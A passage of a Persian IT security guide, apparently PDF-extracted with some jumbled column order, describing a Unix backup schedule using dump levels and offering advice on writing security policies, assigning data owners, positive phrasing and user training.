ﻼ ﻳﻚ ﻧﻤﻮﻧﻪ ﺭﺍﻫﺒﺮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﺫﻳ ﹰ
Authentication Token
Smart Card
Biometric
78
79
80
١٥١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﺑﺮﻧﺎﻣــﺔ " "dumpﺗﻬﻴــﻪ ﺷــﻮﻧﺪ .ﺗﻬﻴــﺔ ﭘــﺸﺘﻴﺒﺎﻥ ﺍﺯ
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ۲۴ﺳﺎﻋﺖ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﻲﺷﻮﺩ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺷﺐ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛـﺎﺭﺑﺮﻩ ﺍﻧﺠـﺎﻡ
ﺷﻮﺩ .ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ۲۴ﺳﺎﻋﺘﻪ ﺩﺭﺣـﺎﻝ
ﻓﻌﺎﻟﻴﺖ ﻫﺴﺘﻨﺪ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣـﺎﻥ ﻧﺰﺩﻳﻜﺘـﺮﻳﻦ ﺗﻐﻴﻴـﺮ ﺷـﻴﻔﺖ
ﻛﺎﺭﻱ ﺑﻪ ﻧﻴﻤﻪﺷﺐ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ )ﺯﻣﺎﻧﻲ ﻛﻪ ﺑﺎﺭ ﻛﺎﺭﻱ ﺳﻴـﺴﺘﻢ
ﺍﺯ ﻫﻤﻴﺸﻪ ﻛﻤﺘﺮ ﺍﺳﺖ( .ﺗﻤﺎﻡ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻼﻓﺎﺻـﻠﻪ
ﭘﺲ ﺍﺯ ﻧﻮﺷﺘﻪ ﺷﺪﻥ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺧﻮﺍﻧﺪﻩ ﺷـﻮﻧﺪ ﺗـﺎ ﺻـﺤﺖ
ﺍﻃﻼﻋﺎﺕ ﻧﻮﺷﺘﻪﺷﺪﻩ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺪ.
ﺩﺭ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ ،ﭘـﺸﺘﻴﺒﺎﻥ
ﺳﻄﺢ ﺻﻔﺮ ٨١ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ .ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺳـﻄﺢ ۳ﺑﺎﻳـﺪ
ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺩﺭ ﻫﺮ ﻫﻔﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ
ﺍﺯ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ ﻫﻔﺘـﻪ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺍﻧﺘﺨـﺎﺏ
ﻣﻲﻛﻨﺪ ﺗﺎ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑـﺮﺍﻱ ﻛـﺴﺐ
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺻﺤﻴﺢ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ،
ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﺪ.
ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﻤﺎﺭﻳﻬﺎﻱ ﺧﺎﺹ ﻭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﻭﻳـﮋﻩ ﺗﻬﻴـﻪ
ﻣﻲ ﺷﻮﻧﺪ؛ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮﻱ ﺗﻐﻴﻴﺮ
ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺷﺮﺍﻳﻂ ﻣﺘﻐﻴﺮ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺻـﺤﻴﺢ ﻣـﻨﻌﻜﺲ
ﻛﻨﻨﺪ.
ﻧﻜﺎﺕ ﻛﻠﻴﺪﻱ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺁ
ﻧﻘـﺶ ﺳﻴﺎﺳــﺖ )ﻭ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ( ﻛﻤــﻚ ﺑــﻪ
ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺭﻭﻳﻬﻤﺮﻓﺘﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺗﻠﻘـﻲ
ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺳﻴﺎﺳﺘﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ
ﻭﻳﮋﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ
ﺳﻴﺎﺳﺖ ﻣﺤﻴﻂ ﺷﻤﺎ ﻛﺎﻓﻲ ﺍﺳﺖ ،ﻣﺎﻧﻨﺪ ﻣﺜﺎﻝ ﺯﻳﺮ:
ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻭﻇﻴﻔﺔ ﻫﻤـﻪ ﻣـﻲﺑﺎﺷـﺪ.
Level 0 dump
81
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻻﺯﻡ ﺍﺳﺖ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲﺗﺮ ﻛـﻪ ﺗﻮﺳـﻂ
ﻳﻚ ﻣﺘﺨﺼﺺ ﺭﺳﻤﻲ ﻭ ﭼﻨﺪ ﻣﺸﺎﻭﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺷـﺪﻩ ﺭﺍ
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎﻳﺘﺎﻥ ﺑﻜﺎﺭ ﺑﺮﻳﺪ .ﺳﻴﺎﺳﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑـﺎ
ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ ﺑـﺮﺍﻱ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ
ﻣﻼﺣﻈﺎﺕ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻻﺯﻡ ﺍﺳـﺖ ﺑﻄـﻮﺭ ﻣﺠـﺰﺍ ﺩﺭ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺗﺨﺼﻴﺺ ﻳﻚ ﻣﺴﺌﻮﻝ
ﻫﺮ ﺟﺰﺀ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ
ﮔﻴﺮﺩ ﺑﺎﻳﺪ ﻳﻚ ﻣﺴﺌﻮﻝ ﻣﻌﻴﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ" .ﻣﺴﺌﻮﻝ" ﻛﺴﻲ ﺍﺳﺖ
ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ،ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ،ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻭ ﺳﺎﻳﺮ
ﺟﻨﺒﻪﻫﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﺩ .ﺍﻭ ﻫﻤﭽﻨـﻴﻦ
ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺍﺳـﺖ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋـﺎﺕ
ﻣﻬﻤــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻣــﺴﺌﻮﻝ ﻣﺸﺨــﺼﻲ ﻧــﺪﺍﺭﺩ .ﺩﺭﻧﺘﻴﺠــﻪ
ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺩﺍﻧﻨﺪ ﭼﻪ ﻛـﺴﻲ ﺩﺭﺑـﺎﺭﺓ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﺍﻃﻼﻋـﺎﺕ
ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﭼﻪ ﻛﺴﻲ ﺿﻮﺍﺑﻂ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ
ﺗﺪﻭﻳﻦ ﻣﻲﻧﻤﺎﻳﺪ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ )ﻭ ﻫﻤﭽﻨـﻴﻦ ﺗﺠﻬﻴـﺰﺍﺕ(
ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﻣﺘﻮﺟﻪ ﺷـﻮﺩ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﻃـﻮﻻﻧﻲ ﻧﺎﭘﺪﻳـﺪ
ﻣﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺁﻧﻬﺎ ﻧﻴﺴﺖ ﻛﻪ ﺷﺮﺍﻳﻂ ﺭﺍ ﻛﻨﺘﺮﻝ
ﻛﻨﺪ.
ﻣﺜﺒﺖ ﺑﺎﺷﻴﺪ
ﺍﻓﺮﺍﺩ ﺑﻪ ﺟﻤـﻼﺕ ﻣﺜﺒـﺖ ﻭ ﺍﺛﺒـﺎﺗﻲ ﺑﻬﺘـﺮ ﺍﺯ ﺟﻤـﻼﺕ ﻣﻨﻔـﻲ ﻭ
ﻋﺒﺎﺭﺍﺕ ﻧﻔـﻲﻛﻨﻨـﺪﻩ ﻭﺍﻛـﻨﺶ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫﻨـﺪ .ﺑﺠـﺎﻱ ﺗﻬﻴـﻪ
ﻟﻴﺴﺘﻬﺎﻱ ﻃﻮﻳﻞ ﺍﺯ ﻋﺒﺎﺭﺗﻬﺎﻱ "ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﻴﺪ" ،ﺑﺒﻴﻨﻴﺪ ﻛﻪ
ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﺎﻥ ﺿﻮﺍﺑﻂ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺜﺒـﺖ ﺟﻤﻠـﻪﺑﻨـﺪﻱ
ﻧﻤﺎﻳﻴﺪ .ﺳﻴﺎﺳﺖ ﺧﻼﺻﺔ ﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣﺠﻤﻮﻋـﻪﺍﻱ
ﺍﺯ "ﻧﺒﺎﻳﺪﻫـﺎ" ﻣﻄـﺎﺑﻖ ﺯﻳـﺮ ﺗﻬﻴـﻪ ﻛـﺮﺩ؛ ﺍﻣـﺎ ﺑﺒﻴﻨﻴـﺪ ﻛـﻪ ﻫﻤـﺎﻥ
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﺍﻭﻝ ﻭ ﭘﺎﻧﺰﺩﻫﻢ ﻫﺮ ﻣﺎﻩ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ .ﭘـﺸﺘﻴﺒﺎﻥ ﮔﻴـﺮﻱ
ﺳﻄﺢ ۵ﺑﺎﻳﺪ ﺷﺒﻬﺎﻱ ﻫﺮ ﺩﻭﺷﻨﺒﻪ ﻭ ﭘﻨﺞﺷﻨﺒﻪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ،
ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﺸﺘﻴﺎﻥ ﺳﻄﺢ ﺻﻔﺮ ﻳﺎ ۳ﺩﺭ ﻫﻤﺎﻧﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ
ﺑﺎﺷﺪ .ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ۷ﺑﺎﻳﺪ ﻳﻚ ﺷﺐ ﺩﺭ ﻣﻴﺎﻥ ﺗﻬﻴﻪ ﺷﻮﺩ،
ﻣﮕﺮ ﺩﺭ ﺍﻳﺎﻡ ﺗﻌﻄﻴﻼﺕ.
ﺗﻨﻬﺎ ﻛﺎﺭﻫﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛﻪ ﻣﺎﻳﻠﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺁﻧﺮﺍ ﺍﻧﺠﺎﻡ
ﺩﻫﻨﺪ .ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﺍﺣﺘـﺮﺍﻡ ﺑﮕﺬﺍﺭﻳـﺪ.
ﭼﻨﺎﻧﭽﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﺷﺪﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻳﺎ ﺧﻮﺩﺗـﺎﻥ
ﺭﻓﻊ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺳﺮﻳﻌﹰﺎ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻴﺪ .ﺑﻪ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ ﺑـﻪ
ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻢ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻳﺪ .ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﺑﭙﺬﻳﺮﻳﺪ ﻭ ﻫﻤﻴﺸﻪ ﺧﻮﺩ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻛﻨﻴـﺪ .ﺍﺯ ﻛﺎﺭﺗـﺎﻥ ﻟـﺬﺕ
ﺑﺒﺮﻳﺪ.
١٥٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻋﺒﺎﺭﺗﻬﺎﻱ ﻗﺒﻠﻲ ﭼﻘﺪﺭ ﺭﺍﺣﺖﺗﺮ ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﺪﻧﺪ:
ﺍﻳﻦ ﻭﻇﻴﻔﺔ ﺷﻤﺎﺳﺖ ﻛﻪ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﺓ
ﻧﺎﺩﺭﺳﺖ ﺑﺸﻮﺩ .ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﻭﺳﺖ ﻧﺪﺍﺭﻳﺪ ﺩﻳﮕﺮﺍﻥ ﺍﻧﺠـﺎﻡ
ﺩﻫﻨــﺪ ﺭﺍ ﺍﻧﺠــﺎﻡ ﻧﺪﻫﻴــﺪ .ﺣــﺮﻳﻢ ﺧــﺼﻮﺻﻲ ﺩﻳﮕــﺮﺍﻥ ﺭﺍ
ﺧﺪﺷﻪﺩﺍﺭ ﻧﻜﻨﻴﺪ .ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﻭ ﻧﺘﻮﺍﻧـﺴﺘﻴﺪ ﺁﻧـﺮﺍ
ﺑﺮﻃﺮﻑ ﻛﻨﻴﺪ ،ﻣﺸﻜﻞ ﺭﺍ ﻣﺨﻔﻲ ﻧﮕﻪ ﻧﺪﺍﺭﻳﺪ .ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ
ﺑــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺭﺍ ﻧﻘــﺾ ﻧﻨﻤﺎﻳﻴــﺪ .ﺳــﻌﻲ ﻧﻜﻨﻴــﺪ
ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﮔـﺮﺩﻥ ﺩﻳﮕـﺮﺍﻥ ﺑﻴﻨﺪﺍﺯﻳـﺪ؛ ﻭ
ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻧﻨﻤﺎﻳﻴﺪ .ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺍﻭﻗـﺎﺕ ﺑـﺪﻱ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ!
ﻭﻗﺘﻲ ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ ،ﻫﻤﻮﺍﺭﻩ ﺭﻓﺘﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺫﻫـﻦ
ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺁﻧﻬﺎ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﻜﺎﺕ ،ﺗﻌﺒﻴـ ﹺﺮ
ﻧﺎﺩﺭﺳﺖ ﻣﻲﻛﻨﻨﺪ .ﺳﻴﺎﺳﺖ ﺷﻤﺎ ﻧﺒﺎﻳﺪ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ
ﺍﺷﺘﺒﺎﻩ ﻛﺎﺭﺑﺮﺍﻥ ،ﺁﻧﺎﻥ ﺭﺍ ﻣﺴﺘﺤﻖ ﻫﺮ ﻣﺠﺎﺯﺍﺗﻲ ﺑﺪﺍﻧﺪ.
ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺷـﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﺎﺷـﻨﺪ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ
ﺑﺨﻮﺍﻫﻨﺪ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺧﺼﻮﺻﻲ ﻧﮕﻬﺪﺍﺭﻧـﺪ .ﺍﻳـﻦ
ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷـﺎﻣﻞ ﻧﺎﻣـﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﺳﻮﺍﺑﻖ ﺷﺨﺼﻲ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻴﻬﺎﻱ ﺷﻐﻠﻲ ﺑﺎﺷﺪ .ﭘﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ
ﻧﻴﺰ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ؛ ﻫﺮﭼﻨـﺪ ﺷـﺎﻳﺪ ﻧﺘﻮﺍﻧﻴـﺪ
ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻴﺪ .ﺧﻼﺻﺔ ﻣﻄﻠﺐ ﺍﻳﻨﻜـﻪ ﺍﺯ
ﻧﻴﺎﺯﻫﺎ ﻭ ﺍﺣﺴﺎﺳﺎﺕ ﻛﺎﺭﺑﺮﺍﻥ ﻏﺎﻓﻞ ﻧﺸﻮﻳﺪ.
ﺑﺮ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﺗﻤﺮﻛﺰ ﻛﻨﻴﺪ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺁﻣـﻮﺯﺵ ﻭ ﺑـﺎﺯﺁﻣﻮﺯﻱ ﻛﻠﻴـﺔ
ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻫﺮ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ ﺍﻭﻟﻴـﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ
ﺍﻣﻨﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻭ ﺳﭙﺲ ﺁﻥ ﻣﻄﺎﻟﺐ ﺑﺎﻳﺪ ﺩﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﻭ
ﻗﺎﻟﺐ ﻣﺸﺨﺺ ﺑﺮﺍﻱ ﻭﻱ ﻳﺎﺩﺁﻭﺭﻱ ﺷﻮﻧﺪ )ﺣﺘﻲ ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﻳـﺎﺩﺁﻭﺭﻱ
ﺗﻨﻬﺎ ﺷﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺎﺷـﺪ!( .ﺍﺣﺘﻤـﺎﻝ
ﮔﺮﻓﺘﺎﺭﺷــﺪﻥ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﻣــﻮﺯﺵﺩﻳــﺪﻩ ﺩﺭ ﺗﺮﻓﻨــﺪﻫﺎ ﻭ ﺧــﺼﻮﺻﹰﺎ
ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻛﻤﺘﺮ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﻛـﺎﺭﺑﺮﺍﻥ
ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭼﺮﺍ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻪﺍﻧﺪ ،ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ
ﺍﺯ ﺁﻧﻬﺎ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﻛﻨﻨﺪ ﻭ ﻫﺮﻳﻚ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ.
ﻳﻚ ﺑﺨﺶ ﺣﻴﺎﺗﻲ ﻫﺮ ﺳﻴﺴﺘ ﹺﻢ ﺍﻣﻨﻴﺖ ،ﺍﻋﻄﺎﻱ ﺯﻣـﺎﻥ ﻭ ﻓـﺮﺍﻫﻢ
ﻛﺮﺩﻥ ﭘﺸﺘﻴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺤﺼﻴﻞ ﻭ ﺁﻣﻮﺯﺵ ﺑﻴﺸﺘﺮ ﻛﺎﺭﻛﻨﺎﻥ ﺍﺳـﺖ.
ﻫﻤــﻮﺍﺭﻩ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧــﻮ ،ﺗﻬﺪﻳــﺪﺍﺕ ﺟﺪﻳــﺪ ،ﺭﻭﺷــﻬﺎﻱ ﻧــﻮﻳﻦ ،ﻭ
ﺍﻃﻼﻋــﺎﺕ ﺗــﺎﺯﻩ ﺑــﺮﺍﻱ ﻳــﺎﺩﮔﻴﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ .ﺍﮔــﺮ ﻛﺎﺭﻣﻨــﺪﺍﻥ
ﻫﻔﺘﻪﺍﻱ ۶۰ﺳﺎﻋﺖ ﺻﺮﻑ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻴﺎﻟﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ
ﺷﺨﺼﻲ ﻭ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻨﻨـﺪ ،ﺑـﺎﺯﻫﻢ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺳﺎﻻﻧﻪ ﺗﻨﻬﺎ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﻫﻔﺘـﻪ ﺗﺤـﺖ ﺁﻣـﻮﺯﺵ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻛﺎﺭﺁﻳﻲ ﻧﺪﺍﺭﻧﺪ .ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﺑﻪ ﺁﻧﻬﺎ ﻓﺮﺻﺖ
